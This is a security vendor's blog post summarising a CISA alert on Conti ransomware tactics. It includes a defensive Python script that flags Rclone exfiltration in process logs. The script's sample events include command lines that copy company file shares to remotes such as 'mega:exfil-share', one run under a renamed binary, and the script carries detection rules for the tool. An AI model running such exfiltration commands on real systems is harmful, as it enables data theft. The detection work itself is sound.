Existing Coverage in SafeBreach Hacker’s Playbook for US-CERT Alert (AA21-265A) – Conti Ransomware
On September 22nd, the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI) issued an alert about the increased use of Conti ransomware in more than 400 attacks on U.S. and international organizations. The tactics, techniques, and procedures (TTPs) involved are described in US-CERT Alert (AA21-265A) – Conti Ransomware. Threat actors leveraging Conti ransomware steal files, encrypt servers and workstations, and demand a ransom payment.
Conti ransomware uses the ransomware-as-a-service (RaaS) model and threat actors leveraging Conti ransomware often gain access to organizations in one of the following ways:
According to the details provided by CISA and the FBI, the ransomware uses Router Scan, a penetration testing tool, during its execution phase to maliciously scan for and brute force routers, cameras, and network-attached storage devices with web interfaces. Threat actors have also been observed using Kerberos attacks in an attempt to obtain the Admin hash to conduct brute force attacks. CISA and the FBI also observed that Conti actors are known to exploit legitimate remote monitoring and management software and remote desktop software as backdoors to maintain persistence on victim networks.
During the exfiltration phase, Conti actors often use the open-source Rclone command line program. After the actors steal and encrypt the victim's sensitive data, they employ a double extortion technique in which they demand the victim pay a ransom for the release of the encrypted data and threaten the victim with the public release of the data if the ransom is not paid.
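The Rclone detail above is the one TTP in the alert summary that defenders can check for directly in process-creation telemetry. The script below is an added example written for this post; it is not SafeBreach playbook code and not from the CISA alert. It scans a handful of constructed process-creation events (tab-separated timestamp, host, user, command line) and flags Rclone activity three ways: the binary is named rclone, the argument shape matches an Rclone transfer (`copy`, `sync`, `move`, `copyto`, `moveto` followed by a `<remote>:<path>` target) even when the binary has been renamed, or a `--config` file is loaded from a user-writable staging directory. The subcommand names are real Rclone subcommands; the log format, host names, remote names and the list of suspect directories are assumptions for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events, not taken from the alert or from
# any real incident. Columns: timestamp, host, user, command line (tab-separated).
SAMPLE_EVENTS = (
    "2021-09-22T10:01:07Z\tFS01\tCORP\\svc_backup\t"
    "C:\\Tools\\rclone.exe copy D:\\Shares\\Finance mega:exfil-share --transfers 32\n"
    "2021-09-22T10:03:15Z\tWS17\tCORP\\jdoe\tC:\\Git\\bin\\git.exe pull\n"
    "2021-09-22T10:05:44Z\tFS01\tCORP\\svc_backup\t"
    "C:\\Users\\Public\\svchost.exe sync \\\\FS01\\HR remote:hr-dump --config C:\\Users\\Public\\rc.conf\n"
    "2021-09-22T10:07:02Z\tWS03\tCORP\\asmith\trclone.exe lsd onedrive:\n"
    "2021-09-22T10:09:30Z\tWS03\tCORP\\asmith\tnotepad.exe C:\\Users\\asmith\\notes.txt\n"
)

# Real rclone subcommands: the first group moves data, the second only lists remotes.
TRANSFER_CMDS = {"copy", "sync", "move", "copyto", "moveto"}
LIST_CMDS = {"lsd", "ls", "lsf", "lsl", "listremotes"}
ALL_CMDS = TRANSFER_CMDS | LIST_CMDS
# rclone addresses a configured remote as "<name>:<path>". Requiring a name of at
# least two characters, not preceded by a path character and not followed by a
# slash, keeps Windows drive letters such as D:\ and UNC paths from matching.
REMOTE_RE = re.compile(r"(?<![\w\\/:])([A-Za-z][\w-]+):(?![\\/])")
# Directories a scheduled backup job would rarely keep its rclone config in
# (assumption for this example; tune to the environment).
SUSPECT_CONFIG_DIRS = ("\\users\\public\\", "\\programdata\\", "\\temp\\")


@dataclass
class Finding:
    timestamp: str
    host: str
    user: str
    severity: str
    reasons: list
    command: str


def analyse_command(cmdline):
    """Return (severity, reasons) for one command line; (None, []) if nothing matched."""
    tokens = cmdline.split()
    if not tokens:
        return None, []
    lower = cmdline.lower()
    reasons = []
    remotes = REMOTE_RE.findall(cmdline)
    # First rclone-looking subcommand after the binary (paths with spaces are tolerated
    # because we only need the subcommand token, not an exact argv split).
    subcmd = next((t.lower() for t in tokens[1:] if t.lower() in ALL_CMDS), None)
    named_rclone = "rclone" in tokens[0].lower()

    if named_rclone:
        reasons.append("rclone binary invoked")
    if subcmd in TRANSFER_CMDS and remotes:
        reasons.append(f"transfer subcommand '{subcmd}' to remote '{remotes[-1]}'")
        if not named_rclone:
            reasons.append("rclone argument shape under a non-rclone binary name (possible renamed binary)")
    elif subcmd in LIST_CMDS and remotes:
        reasons.append(f"remote enumeration via '{subcmd}' against '{remotes[-1]}'")
    if "--config" in lower and any(d in lower for d in SUSPECT_CONFIG_DIRS):
        reasons.append("--config file loaded from a user-writable staging directory")

    if not reasons:
        return None, []
    severity = "high" if (subcmd in TRANSFER_CMDS and remotes) else "medium"
    return severity, reasons


def scan_events(text):
    """Parse tab-separated events and return a Finding for every suspicious command line."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, cmdline = line.split("\t", 3)
        severity, reasons = analyse_command(cmdline)
        if severity:
            findings.append(Finding(ts, host, user, severity, reasons, cmdline))
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f.severity.upper()}] {f.timestamp} {f.host} {f.user}: {'; '.join(f.reasons)}")
```

Run against the constructed events, the script reports the two transfers on FS01 as high severity (the second one also because the binary was renamed to svchost.exe and its config sits under C:\Users\Public) and the `lsd` remote listing on WS03 as medium, while the git and notepad events produce nothing. The argument-shape rule is the useful part: renaming the binary is cheap for an attacker, but an Rclone transfer still needs a subcommand and a `remote:` target on the command line.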
The existing attack methods for US-CERT AA21-265A Conti Ransomware are already in the SafeBreach Hacker’s Playbook and ready to be run across your simulators. The Known Attack Series report has been updated so you can run the specific attacks from this US-CERT alert. From the Known Attack Series report, select the US-CERT AA21-265A (Conti Ransomware) report and select Run Simulations, which will run all attack methods.